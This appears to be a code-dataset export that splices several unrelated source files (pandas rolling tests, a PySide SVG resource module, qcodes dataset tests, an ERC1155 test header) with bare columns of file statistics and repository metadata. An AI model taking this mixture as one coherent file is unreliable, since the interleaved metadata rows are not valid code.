series = pd.Series(data, index, name='A')
for window in range(0, len(series) + 3, 2):
for min_periods, ddof in product(range(0, window, 2), [0, 1]):
with self.subTest(series=series, window=window,
min_periods=min_periods, ddof=ddof):
jit_result = hpat_func(series, window, min_periods, ddof)
ref_result = test_impl(series, window, min_periods, ddof)
pd.testing.assert_series_equal(jit_result, ref_result)
@skip_sdc_jit('Series.rolling.var() unsupported exceptions')
def test_series_rolling_var_exception_unsupported_ddof(self):
test_impl = series_rolling_var_usecase
hpat_func = self.jit(test_impl)
series = pd.Series([1., -1., 0., 0.1, -0.1])
with self.assertRaises(TypingError) as raises:
hpat_func(series, 3, 2, '1')
msg = 'Method rolling.var(). The object ddof\n given: unicode_type\n expected: int'
self.assertIn(msg, str(raises.exception))
if __name__ == "__main__":
unittest.main()
| 46.647059
| 119
| 0.574326
| 6,175
| 46,787
| 4.178138
| 0.055709
| 0.045271
| 0.056434
| 0.046047
| 0.900465
| 0.885039
| 0.865736
| 0.834341
| 0.82062
| 0.803798
| 0
| 0.033168
| 0.296963
| 46,787
| 1,002
| 120
| 46.693613
| 0.751193
| 0.055956
| 0
| 0.734317
| 0
| 0.00615
| 0.086942
| 0.010905
| 0
| 0
| 0
| 0.000998
| 0.130381
| 1
| 0.097171
| false
| 0
| 0.01599
| 0.03075
| 0.163592
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a73c52fe01bb883dc02ee8d3e17255d9110fcc6f
| 252
|
py
|
Python
|
example/sub.py
|
mtulio/commons
|
2cb8e33e1b8e303607d7bb47fce12d5b6bc92d26
|
[
"Apache-2.0"
] | null | null | null |
example/sub.py
|
mtulio/commons
|
2cb8e33e1b8e303607d7bb47fce12d5b6bc92d26
|
[
"Apache-2.0"
] | 8
|
2017-01-21T23:34:13.000Z
|
2017-01-24T03:15:12.000Z
|
example/sub.py
|
mtulio/commons
|
2cb8e33e1b8e303607d7bb47fce12d5b6bc92d26
|
[
"Apache-2.0"
] | null | null | null |
class SubClass():
def __init__(self):
self.message = 'init - SubFile - mtulio.example.sub Class'
def returnMessage(self):
return self.message
def subMessageHelloWorld():
return 'init - SubFile - mtulio.example.sub Method'
| 25.2
| 66
| 0.674603
| 28
| 252
| 5.928571
| 0.5
| 0.13253
| 0.204819
| 0.289157
| 0.325301
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.218254
| 252
| 9
| 67
| 28
| 0.84264
| 0
| 0
| 0
| 0
| 0
| 0.330677
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.428571
| false
| 0
| 0
| 0.285714
| 0.857143
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
a74cc3f751a93561a30dac8c04fdacc7ea88fd67
| 13,897
|
py
|
Python
|
Controls/env/Lib/site-packages/PySide/examples/desktop/systray/systray_rc.py
|
LoicBoileau/Projet-S4---Robot-Delta
|
0de0768e2609c18fbf060eb6726150a99080db1c
|
[
"MIT"
] | 32
|
2015-11-06T02:59:41.000Z
|
2021-02-12T02:44:42.000Z
|
Controls/env/Lib/site-packages/PySide/examples/desktop/systray/systray_rc.py
|
LoicBoileau/Projet-S4---Robot-Delta
|
0de0768e2609c18fbf060eb6726150a99080db1c
|
[
"MIT"
] | 56
|
2020-01-15T15:44:40.000Z
|
2021-11-15T17:50:24.000Z
|
python/Lib/site-packages/PySide/examples/desktop/systray/systray_rc.py
|
jfveronelli/sqink
|
5e9e6bc6c5c6c00abbc07099bc1fa1ab6cf79577
|
[
"Unlicense"
] | 4
|
2016-02-01T09:15:05.000Z
|
2020-04-30T03:41:04.000Z
|
# -*- coding: utf-8 -*-
# Resource object code
#
# Created: st 14. 10 21:40:02 2015
# by: The Resource Compiler for PySide (Qt v4.8.7)
#
# WARNING! All changes made in this file will be lost!
from PySide import QtCore
qt_resource_data = b"\x00\x00\x0fX<?xml version=\x221.0\x22 encoding=\x22UTF-8\x22 standalone=\x22no\x22?>\x0d\x0a<!-- Created with Inkscape (http://www.inkscape.org/) --><svg viewBox=\x22100 200 550 500\x22 height=\x22841.88976pt\x22 id=\x22svg1\x22 inkscape:version=\x220.40+cvs\x22 sodipodi:docbase=\x22C:\x5cDocuments and Settings\x5cJon Phillips\x5cMy Documents\x5cprojects\x5cclipart-project\x5csubmissions\x22 sodipodi:docname=\x22heart-left-highlight.svg\x22 sodipodi:version=\x220.32\x22 width=\x22595.27559pt\x22 xmlns=\x22http://www.w3.org/2000/svg\x22 xmlns:cc=\x22http://web.resource.org/cc/\x22 xmlns:dc=\x22http://purl.org/dc/elements/1.1/\x22 xmlns:inkscape=\x22http://www.inkscape.org/namespaces/inkscape\x22 xmlns:rdf=\x22http://www.w3.org/1999/02/22-rdf-syntax-ns#\x22 xmlns:sodipodi=\x22http://inkscape.sourceforge.net/DTD/sodipodi-0.dtd\x22 xmlns:svg=\x22http://www.w3.org/2000/svg\x22>\x0d\x0a<metadata>\x0d\x0a<rdf:RDF xmlns:cc=\x22http://web.resource.org/cc/\x22 xmlns:dc=\x22http://purl.org/dc/elements/1.1/\x22 xmlns:rdf=\x22http://www.w3.org/1999/02/22-rdf-syntax-ns#\x22>\x0d\x0a<cc:Work rdf:about=\x22\x22>\x0d\x0a<dc:title>Heart Left-Highlight</dc:title>\x0d\x0a<dc:description>This is a normal valentines day heart.</dc:description>\x0d\x0a<dc:subject>\x0d\x0a<rdf:Bag>\x0d\x0a<rdf:li>holiday</rdf:li>\x0d\x0a<rdf:li>valentines</rdf:li>\x0d\x0a<rdf:li></rdf:li>\x0d\x0a<rdf:li>valentine</rdf:li>\x0d\x0a<rdf:li>hash(0x8a091c0)</rdf:li>\x0d\x0a<rdf:li>hash(0x8a0916c)</rdf:li>\x0d\x0a<rdf:li>signs_and_symbols</rdf:li>\x0d\x0a<rdf:li>hash(0x8a091f0)</rdf:li>\x0d\x0a<rdf:li>day</rdf:li>\x0d\x0a</rdf:Bag>\x0d\x0a</dc:subject>\x0d\x0a<dc:publisher>\x0d\x0a<cc:Agent rdf:about=\x22http://www.openclipart.org\x22>\x0d\x0a<dc:title>Jon Phillips</dc:title>\x0d\x0a</cc:Agent>\x0d\x0a</dc:publisher>\x0d\x0a<dc:creator>\x0d\x0a<cc:Agent>\x0d\x0a<dc:title>Jon Phillips</dc:title>\x0d\x0a</cc:Agent>\x0d\x0a</dc:creator>\x0d\x0a<dc:rights>\x0d\x0a<cc:Agent>\x0d\x0a<dc:title>Jon Phillips</dc:title>\x0d\x0a</cc:Agent>\x0d\x0a</dc:rights>\x0d\x0a<dc:date></dc:date>\x0d\x0a<dc:format>image/svg+xml</dc:format>\x0d\x0a<dc:type rdf:resource=\x22http://purl.org/dc/dcmitype/StillImage\x22/>\x0d\x0a<cc:license rdf:resource=\x22http://web.resource.org/cc/PublicDomain\x22/>\x0d\x0a<dc:language>en</dc:language>\x0d\x0a</cc:Work>\x0d\x0a<cc:License rdf:about=\x22http://web.resource.org/cc/PublicDomain\x22>\x0d\x0a<cc:permits rdf:resource=\x22http://web.resource.org/cc/Reproduction\x22/>\x0d\x0a<cc:permits rdf:resource=\x22http://web.resource.org/cc/Distribution\x22/>\x0d\x0a<cc:permits rdf:resource=\x22http://web.resource.org/cc/DerivativeWorks\x22/>\x0d\x0a</cc:License>\x0d\x0a</rdf:RDF>\x0d\x0a</metadata>\x0d\x0a<defs id=\x22defs3\x22/>\x0d\x0a<sodipodi:namedview bordercolor=\x22#666666\x22 borderopacity=\x221.0\x22 id=\x22base\x22 inkscape:current-layer=\x22layer1\x22 inkscape:cx=\x22549.40674\x22 inkscape:cy=\x22596.00159\x22 inkscape:document-units=\x22px\x22 inkscape:guide-bbox=\x22true\x22 inkscape:pageopacity=\x220.0\x22 inkscape:pageshadow=\x222\x22 inkscape:window-height=\x22615\x22 inkscape:window-width=\x22866\x22 inkscape:window-x=\x2288\x22 inkscape:window-y=\x22116\x22 inkscape:zoom=\x220.35000000\x22 pagecolor=\x22#ffffff\x22 showguides=\x22true\x22/>\x0d\x0a<g id=\x22layer1\x22 inkscape:groupmode=\x22layer\x22 inkscape:label=\x22Layer 1\x22>\x0d\x0a<path d=\x22M 263.41570,235.14588 C 197.17570,235.14588 143.41575,288.90587 143.41575,355.14588 C 143.41575,489.90139 279.34890,525.23318 371.97820,658.45392 C 459.55244,526.05056 600.54070,485.59932 600.54070,355.14588 C 600.54070,288.90588 546.78080,235.14587 480.54070,235.14588 C 432.49280,235.14588 391.13910,263.51631 371.97820,304.33338 C 352.81740,263.51630 311.46370,235.14587 263.41570,235.14588 z \x22 id=\x22path7\x22 sodipodi:nodetypes=\x22ccccccc\x22 style=\x22fill:#e60000;fill-opacity:1.0000000;stroke:#000000;stroke-width:18.700001;stroke-miterlimit:4.0000000;stroke-opacity:1.0000000\x22/>\x0d\x0a<path d=\x22M 265.00000,253.59375 C 207.04033,253.59375 160.00000,300.63407 160.00000,358.59375 C 160.00000,476.50415 278.91857,507.43251 359.96875,624.00000 C 366.52868,614.08205 220.00000,478.47309 220.00000,378.59375 C 220.00000,320.63407 267.04033,273.59375 325.00000,273.59375 C 325.50453,273.59375 325.99718,273.64912 326.50000,273.65625 C 309.22436,261.07286 288.00557,253.59374 265.00000,253.59375 z \x22 id=\x22path220\x22 sodipodi:nodetypes=\x22ccccccc\x22 style=\x22fill:#e6e6e6;fill-opacity:0.64556962;stroke:none;stroke-width:18.700001;stroke-miterlimit:4.0000000;stroke-opacity:1.0000000\x22/>\x0d\x0a</g>\x0d\x0a</svg>\x0d\x0a\x00\x00\x0do<?xml version=\x221.0\x22 encoding=\x22UTF-8\x22 standalone=\x22no\x22?>\x0d\x0a<!DOCTYPE svg PUBLIC \x22-//W3C//DTD SVG 20010904//EN\x22\x0d\x0a\x22http://www.w3.org/TR/2001/REC-SVG-20010904/DTD/svg10.dtd\x22>\x0d\x0a<svg viewBox=\x22-10 -10 178 178\x22 height=\x22177.523\x22 id=\x22svg1\x22 inkscape:version=\x220.40\x22 sodipodi:docbase=\x22/mnt/donnees/09-Mes_images/Travaux/Travaux vectoriel/pictogrammes/s\xc3\xa9cu SVG/produits chimiques\x22 sodipodi:docname=\x22XiIrritant.svg\x22 sodipodi:version=\x220.32\x22 width=\x22155.932\x22 xmlns=\x22http://www.w3.org/2000/svg\x22 xmlns:cc=\x22http://web.resource.org/cc/\x22 xmlns:dc=\x22http://purl.org/dc/elements/1.1/\x22 xmlns:inkscape=\x22http://www.inkscape.org/namespaces/inkscape\x22 xmlns:rdf=\x22http://www.w3.org/1999/02/22-rdf-syntax-ns#\x22 xmlns:sodipodi=\x22http://sodipodi.sourceforge.net/DTD/sodipodi-0.dtd\x22 xmlns:xlink=\x22http://www.w3.org/1999/xlink\x22>\x0d\x0a<metadata>\x0d\x0a<rdf:RDF xmlns:cc=\x22http://web.resource.org/cc/\x22 xmlns:dc=\x22http://purl.org/dc/elements/1.1/\x22 xmlns:rdf=\x22http://www.w3.org/1999/02/22-rdf-syntax-ns#\x22>\x0d\x0a<cc:Work rdf:about=\x22\x22>\x0d\x0a<dc:title>Irritant</dc:title>\x0d\x0a<dc:description>produit chimique</dc:description>\x0d\x0a<dc:subject>\x0d\x0a<rdf:Bag>\x0d\x0a<rdf:li></rdf:li>\x0d\x0a<rdf:li>symbol</rdf:li>\x0d\x0a<rdf:li>signs_and_symbols</rdf:li>\x0d\x0a</rdf:Bag>\x0d\x0a</dc:subject>\x0d\x0a<dc:publisher>\x0d\x0a<cc:Agent rdf:about=\x22http://www.openclipart.org\x22>\x0d\x0a<dc:title>yves GUILLOU</dc:title>\x0d\x0a</cc:Agent>\x0d\x0a</dc:publisher>\x0d\x0a<dc:creator>\x0d\x0a<cc:Agent>\x0d\x0a<dc:title>yves GUILLOU</dc:title>\x0d\x0a</cc:Agent>\x0d\x0a</dc:creator>\x0d\x0a<dc:rights>\x0d\x0a<cc:Agent>\x0d\x0a<dc:title>yves GUILLOU</dc:title>\x0d\x0a</cc:Agent>\x0d\x0a</dc:rights>\x0d\x0a<dc:date></dc:date>\x0d\x0a<dc:format>image/svg+xml</dc:format>\x0d\x0a<dc:type rdf:resource=\x22http://purl.org/dc/dcmitype/StillImage\x22/>\x0d\x0a<cc:license rdf:resource=\x22http://web.resource.org/cc/PublicDomain\x22/>\x0d\x0a<dc:language>en</dc:language>\x0d\x0a</cc:Work>\x0d\x0a<cc:License rdf:about=\x22http://web.resource.org/cc/PublicDomain\x22>\x0d\x0a<cc:permits rdf:resource=\x22http://web.resource.org/cc/Reproduction\x22/>\x0d\x0a<cc:permits rdf:resource=\x22http://web.resource.org/cc/Distribution\x22/>\x0d\x0a<cc:permits rdf:resource=\x22http://web.resource.org/cc/DerivativeWorks\x22/>\x0d\x0a</cc:License>\x0d\x0a</rdf:RDF>\x0d\x0a</metadata>\x0d\x0a<sodipodi:namedview bordercolor=\x22#666666\x22 borderopacity=\x221.0\x22 id=\x22base\x22 inkscape:current-layer=\x22svg1\x22 inkscape:cx=\x2262.372805\x22 inkscape:cy=\x2234.864537\x22 inkscape:pageopacity=\x220.0\x22 inkscape:pageshadow=\x222\x22 inkscape:window-height=\x221121\x22 inkscape:window-width=\x221590\x22 inkscape:window-x=\x22200\x22 inkscape:window-y=\x220\x22 inkscape:zoom=\x226.6399849\x22 pagecolor=\x22#ffffff\x22/>\x0d\x0a<defs id=\x22defs2\x22>\x0d\x0a<marker id=\x22ArrowEnd\x22 markerHeight=\x223\x22 markerUnits=\x22strokeWidth\x22 markerWidth=\x224\x22 orient=\x22auto\x22 refX=\x220\x22 refY=\x225\x22 viewBox=\x220 0 10 10\x22>\x0d\x0a<path d=\x22M 0 0 L 10 5 L 0 10 z\x22 id=\x22path4\x22/>\x0d\x0a</marker>\x0d\x0a<marker id=\x22ArrowStart\x22 markerHeight=\x223\x22 markerUnits=\x22strokeWidth\x22 markerWidth=\x224\x22 orient=\x22auto\x22 refX=\x2210\x22 refY=\x225\x22 viewBox=\x220 0 10 10\x22>\x0d\x0a<path d=\x22M 10 0 L 0 5 L 10 10 z\x22 id=\x22path6\x22/>\x0d\x0a</marker>\x0d\x0a</defs>\x0d\x0a<g id=\x22g7\x22>\x0d\x0a<g id=\x22g8\x22>\x0d\x0a<path d=\x22M 155.932 155.932L 155.932 0L 0 0L 0 155.932L 155.932 155.932z\x22 id=\x22path9\x22 style=\x22stroke:none; fill:#000000\x22/>\x0d\x0a<path d=\x22M 150.83 150.83L 150.83 5.1011L 5.1011 5.1011L 5.1011 150.83L 150.83 150.83z\x22 id=\x22path10\x22 style=\x22stroke:none; fill:#ff9900\x22/>\x0d\x0a</g>\x0d\x0a<g id=\x22g11\x22>\x0d\x0a<path d=\x22M 140.823 111.783L 44.3677 14.0771L 15.1084 44.1489L 111.564 141.854L 140.823 111.783z\x22 id=\x22path12\x22 style=\x22stroke:none; fill:#000000\x22/>\x0d\x0a<path d=\x22M 111.783 15.1084L 14.0771 111.564L 44.1489 140.823L 141.855 44.3677L 111.783 15.1084z\x22 id=\x22path13\x22 style=\x22stroke:none; fill:#000000\x22/>\x0d\x0a</g>\x0d\x0a</g>\x0d\x0a</svg>\x0d\x0a\x00\x00\x0cz<?xml version=\x221.0\x22 encoding=\x22utf-8\x22?>\x0d\x0a<!-- Generator: Adobe Illustrator 10, SVG Export Plug-In . SVG Version: 3.0.0 Build 76) --><svg enable-background=\x22new 0 0 347 348\x22 height=\x22348\x22 i:pageBounds=\x220 792 612 0\x22 i:rulerOrigin=\x220 0\x22 i:viewOrigin=\x22131 567\x22 overflow=\x22visible\x22 space=\x22preserve\x22 viewBox=\x22-20 -20 387 388\x22 width=\x22347\x22 xmlns=\x22http://www.w3.org/2000/svg\x22 xmlns:a=\x22http://ns.adobe.com/AdobeSVGViewerExtensions/3.0/\x22 xmlns:graph=\x22http://ns.adobe.com/Graphs/1.0/\x22 xmlns:i=\x22http://ns.adobe.com/AdobeIllustrator/10.0/\x22 xmlns:x=\x22http://ns.adobe.com/Extensibility/1.0/\x22 xmlns:xlink=\x22http://www.w3.org/1999/xlink\x22>\x0d\x0a<metadata>\x0d\x0a<rdf:RDF xmlns:cc=\x22http://web.resource.org/cc/\x22 xmlns:dc=\x22http://purl.org/dc/elements/1.1/\x22 xmlns:rdf=\x22http://www.w3.org/1999/02/22-rdf-syntax-ns#\x22>\x0d\x0a<cc:Work rdf:about=\x22\x22>\x0d\x0a<dc:title>Keep Tidy Inside</dc:title>\x0d\x0a<dc:description></dc:description>\x0d\x0a<dc:subject>\x0d\x0a<rdf:Bag>\x0d\x0a<rdf:li></rdf:li>\x0d\x0a<rdf:li>symbol</rdf:li>\x0d\x0a<rdf:li>bin</rdf:li>\x0d\x0a<rdf:li>signs_and_symbols</rdf:li>\x0d\x0a<rdf:li>clean</rdf:li>\x0d\x0a<rdf:li>rubish</rdf:li>\x0d\x0a<rdf:li>trash</rdf:li>\x0d\x0a<rdf:li>inside</rdf:li>\x0d\x0a<rdf:li>garbage</rdf:li>\x0d\x0a<rdf:li>sign</rdf:li>\x0d\x0a</rdf:Bag>\x0d\x0a</dc:subject>\x0d\x0a<dc:publisher>\x0d\x0a<cc:Agent rdf:about=\x22http://www.openclipart.org\x22>\x0d\x0a<dc:title>Martin Owens</dc:title>\x0d\x0a</cc:Agent>\x0d\x0a</dc:publisher>\x0d\x0a<dc:creator>\x0d\x0a<cc:Agent>\x0d\x0a<dc:title>Martin Owens</dc:title>\x0d\x0a</cc:Agent>\x0d\x0a</dc:creator>\x0d\x0a<dc:rights>\x0d\x0a<cc:Agent>\x0d\x0a<dc:title>Martin Owens</dc:title>\x0d\x0a</cc:Agent>\x0d\x0a</dc:rights>\x0d\x0a<dc:date></dc:date>\x0d\x0a<dc:format>image/svg+xml</dc:format>\x0d\x0a<dc:type rdf:resource=\x22http://purl.org/dc/dcmitype/StillImage\x22/>\x0d\x0a<cc:license rdf:resource=\x22http://web.resource.org/cc/PublicDomain\x22/>\x0d\x0a<dc:language>en</dc:language>\x0d\x0a</cc:Work>\x0d\x0a<cc:License rdf:about=\x22http://web.resource.org/cc/PublicDomain\x22>\x0d\x0a<cc:permits rdf:resource=\x22http://web.resource.org/cc/Reproduction\x22/>\x0d\x0a<cc:permits rdf:resource=\x22http://web.resource.org/cc/Distribution\x22/>\x0d\x0a<cc:permits rdf:resource=\x22http://web.resource.org/cc/DerivativeWorks\x22/>\x0d\x0a</cc:License>\x0d\x0a</rdf:RDF>\x0d\x0a</metadata>\x0d\x0a<g i:dimmedPercent=\x2250\x22 i:knockout=\x22Off\x22 i:layer=\x22yes\x22 i:rgbTrio=\x22#4F008000FFFF\x22 id=\x22Layer_1\x22>\x0d\x0a<path d=\x22M347,174c0,96.098-77.679,174-173.5,174C77.679,348,0,270.098,0,174 C0,77.902,77.679,0,173.5,0C269.321,0,347,77.902,347,174z\x22 fill=\x22#10A040\x22 i:knockout=\x22Off\x22/>\x0d\x0a<path d=\x22M238,53c0,13.807-11.864,25-26.5,25S185,66.807,185,53s11.864-25,26.5-25 S238,39.193,238,53z\x22 fill=\x22#FFFFFF\x22 i:knockout=\x22Off\x22/>\x0d\x0a<path d=\x22M66,175c1.055,6.355,19.333,126.417,19.333,126.417h68.333 c0,0,14.105-122.524,14.333-126.417c6.224-0.622,6.667-13-2-13c-12.164,0-89.205-0.059-98,0S61.167,174.487,66,175z\x22 fill=\x22#FFFFFF\x22 i:knockout=\x22Off\x22/>\x0d\x0a<path d=\x22M78,141c17.292-5.325,24.179-23.532,27-31c14.513,6.596,40.333,12.265,59,8 c3.683,19.419-28.043,19.31-23,37C132.577,145.705,89.404,167.292,78,141z\x22 fill=\x22#FFFFFF\x22 i:knockout=\x22Off\x22/>\x0d\x0a<path d=\x22M103,82l139-1c-0.6,3.421,33.633,57.497,29,67c-4.089,0.418-67,5-67,5 c6.109-9.379-13-43-13-43L103,82z\x22 fill=\x22#FFFFFF\x22 i:knockout=\x22Off\x22/>\x0d\x0a<path d=\x22M270,156l-66-3c0,0-23.565,143.355-24,145s1.855,2.536,3,1s51-82,51-82 s19.754,80.701,20,82s3.721,1.209,4,0S270,156,270,156z\x22 fill=\x22#FFFFFF\x22 i:knockout=\x22Off\x22/>\x0d\x0a</g>\x0d\x0a</svg>\x0d\x0a"
qt_resource_name = b"\x00\x06\x07\x03}\xc3\x00i\x00m\x00a\x00g\x00e\x00s\x00\x09\x08\x97\x87\xa7\x00h\x00e\x00a\x00r\x00t\x00.\x00s\x00v\x00g\x00\x07\x08wZ\x07\x00b\x00a\x00d\x00.\x00s\x00v\x00g\x00\x09\x08\x9b\xad\xc7\x00t\x00r\x00a\x00s\x00h\x00.\x00s\x00v\x00g"
qt_resource_struct = b"\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x02\x00\x00\x00*\x00\x00\x00\x00\x00\x01\x00\x00\x0f\x5c\x00\x00\x00\x12\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00>\x00\x00\x00\x00\x00\x01\x00\x00\x1c\xcf"
def qInitResources():
QtCore.qRegisterResourceData(0x01, qt_resource_struct, qt_resource_name, qt_resource_data)
def qCleanupResources():
QtCore.qUnregisterResourceData(0x01, qt_resource_struct, qt_resource_name, qt_resource_data)
qInitResources()
| 631.681818
| 12,848
| 0.756998
| 2,626
| 13,897
| 3.996192
| 0.239909
| 0.101201
| 0.051458
| 0.023061
| 0.623118
| 0.608443
| 0.581189
| 0.558796
| 0.538403
| 0.519154
| 0
| 0.241891
| 0.034972
| 13,897
| 21
| 12,849
| 661.761905
| 0.540601
| 0.013096
| 0
| 0
| 0
| 0.333333
| 0.973371
| 0.510615
| 0
| 0
| 0.002553
| 0
| 0
| 1
| 0.222222
| false
| 0
| 0.111111
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a780e92d5f42551f4db213a60c42a54b15f9ad37
| 131
|
py
|
Python
|
sales_register/adapters/password_hashing/__init__.py
|
tamercuba/purchase-system
|
cfd3e4fecbd96c130f620d11491fa14979c0d996
|
[
"MIT"
] | null | null | null |
sales_register/adapters/password_hashing/__init__.py
|
tamercuba/purchase-system
|
cfd3e4fecbd96c130f620d11491fa14979c0d996
|
[
"MIT"
] | 6
|
2021-05-15T21:44:19.000Z
|
2021-05-23T22:20:13.000Z
|
sales_register/adapters/password_hashing/__init__.py
|
tamercuba/sales-register
|
cfd3e4fecbd96c130f620d11491fa14979c0d996
|
[
"MIT"
] | null | null | null |
from adapters.password_hashing.context import pwd_context
from adapters.password_hashing.implementation import PasswordHashManager
| 43.666667
| 72
| 0.908397
| 15
| 131
| 7.733333
| 0.6
| 0.206897
| 0.344828
| 0.465517
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.061069
| 131
| 2
| 73
| 65.5
| 0.943089
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 1
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 9
|
a7abb77a880cfb53a1dd237f5cf8e5526d35a432
| 2,067
|
py
|
Python
|
qcodes/tests/dataset/test_concurrent_datasets.py
|
riju-pal/QCoDeS_riju
|
816e76809160e9af457f6ef6d4aca1b0dd5eea82
|
[
"MIT"
] | 223
|
2016-10-29T15:00:24.000Z
|
2022-03-20T06:53:34.000Z
|
qcodes/tests/dataset/test_concurrent_datasets.py
|
M1racleShih/Qcodes
|
c03029a6968e16379155aadc8b083a02e01876a6
|
[
"MIT"
] | 3,406
|
2016-10-25T10:44:50.000Z
|
2022-03-31T09:47:35.000Z
|
qcodes/tests/dataset/test_concurrent_datasets.py
|
nikhartman/Qcodes
|
042c5e25ab9e40b20c316b4055c4842844834d1e
|
[
"MIT"
] | 263
|
2016-10-25T11:35:36.000Z
|
2022-03-31T08:53:20.000Z
|
"""
Test that multiple datasets can coexist as expected
"""
import pytest
from qcodes import new_experiment
from qcodes.dataset.data_set import DataSet
def test_foreground_after_background_raises(empty_temp_db_connection):
new_experiment("test", "test1", conn=empty_temp_db_connection)
ds1 = DataSet(conn=empty_temp_db_connection)
ds1.mark_started(start_bg_writer=True)
ds2 = DataSet(conn=empty_temp_db_connection)
with pytest.raises(RuntimeError, match="All datasets written"):
ds2.mark_started(start_bg_writer=False)
def test_background_after_foreground_raises(empty_temp_db_connection):
new_experiment("test", "test1", conn=empty_temp_db_connection)
ds1 = DataSet(conn=empty_temp_db_connection)
ds1.mark_started(start_bg_writer=False)
ds2 = DataSet(conn=empty_temp_db_connection)
with pytest.raises(RuntimeError, match="All datasets written"):
ds2.mark_started(start_bg_writer=True)
def test_background_twice(empty_temp_db_connection):
new_experiment("test", "test1", conn=empty_temp_db_connection)
ds1 = DataSet(conn=empty_temp_db_connection)
ds1.mark_started(start_bg_writer=True)
ds2 = DataSet(conn=empty_temp_db_connection)
ds2.mark_started(start_bg_writer=True)
def test_foreground_twice(empty_temp_db_connection):
new_experiment("test", "test1", conn=empty_temp_db_connection)
ds1 = DataSet(conn=empty_temp_db_connection)
ds1.mark_started(start_bg_writer=False)
ds2 = DataSet(conn=empty_temp_db_connection)
ds2.mark_started(start_bg_writer=False)
def test_foreground_after_background_non_concurrent(empty_temp_db_connection):
new_experiment("test", "test1", conn=empty_temp_db_connection)
ds1 = DataSet(conn=empty_temp_db_connection)
ds1.mark_started(start_bg_writer=True)
ds1.mark_completed()
ds2 = DataSet(conn=empty_temp_db_connection)
ds2.mark_started(start_bg_writer=False)
ds2.mark_completed()
ds3 = DataSet(conn=empty_temp_db_connection)
ds3.mark_started(start_bg_writer=True)
ds3.mark_completed()
| 33.885246
| 78
| 0.789066
| 293
| 2,067
| 5.146758
| 0.16041
| 0.125332
| 0.153183
| 0.29244
| 0.846817
| 0.809019
| 0.769231
| 0.767241
| 0.767241
| 0.740053
| 0
| 0.016556
| 0.123367
| 2,067
| 60
| 79
| 34.45
| 0.815673
| 0.024673
| 0
| 0.675
| 0
| 0
| 0.042331
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.125
| false
| 0
| 0.075
| 0
| 0.2
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a7c347653d1e57c8c3f27fad261db49a3f17e415
| 60,907
|
py
|
Python
|
tests/test_packages/test_contracts/test_erc1155/test_contract.py
|
bryanchriswhite/agents-aea
|
d3f177a963eb855d9528555167255bf2b478f4ba
|
[
"Apache-2.0"
] | 126
|
2019-09-07T09:32:44.000Z
|
2022-03-29T14:28:41.000Z
|
tests/test_packages/test_contracts/test_erc1155/test_contract.py
|
salman6049/agents-aea
|
d3f177a963eb855d9528555167255bf2b478f4ba
|
[
"Apache-2.0"
] | 1,814
|
2019-08-24T10:08:07.000Z
|
2022-03-31T14:28:36.000Z
|
tests/test_packages/test_contracts/test_erc1155/test_contract.py
|
salman6049/agents-aea
|
d3f177a963eb855d9528555167255bf2b478f4ba
|
[
"Apache-2.0"
] | 46
|
2019-09-03T22:13:58.000Z
|
2022-03-22T01:25:16.000Z
|
# -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2018-2020 Fetch.AI Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""The tests module contains the tests of the packages/contracts/erc1155 dir."""
import re
import time
from pathlib import Path
from typing import cast
from unittest import mock
import pytest
from aea_ledger_ethereum import EthereumCrypto
from aea_ledger_fetchai import FetchAIApi, FetchAICrypto
from aea.configurations.loader import (
ComponentType,
ContractConfig,
load_component_configuration,
)
from aea.contracts.base import Contract, contract_registry
from aea.test_tools.test_contract import BaseContractTestCase
from tests.conftest import (
ETHEREUM_ADDRESS_ONE,
ETHEREUM_ADDRESS_TWO,
ETHEREUM_PRIVATE_KEY_PATH,
ETHEREUM_PRIVATE_KEY_TWO_PATH,
ETHEREUM_TESTNET_CONFIG,
FETCHAI_TESTNET_CONFIG,
MAX_FLAKY_RERUNS,
ROOT_DIR,
UseGanache,
)
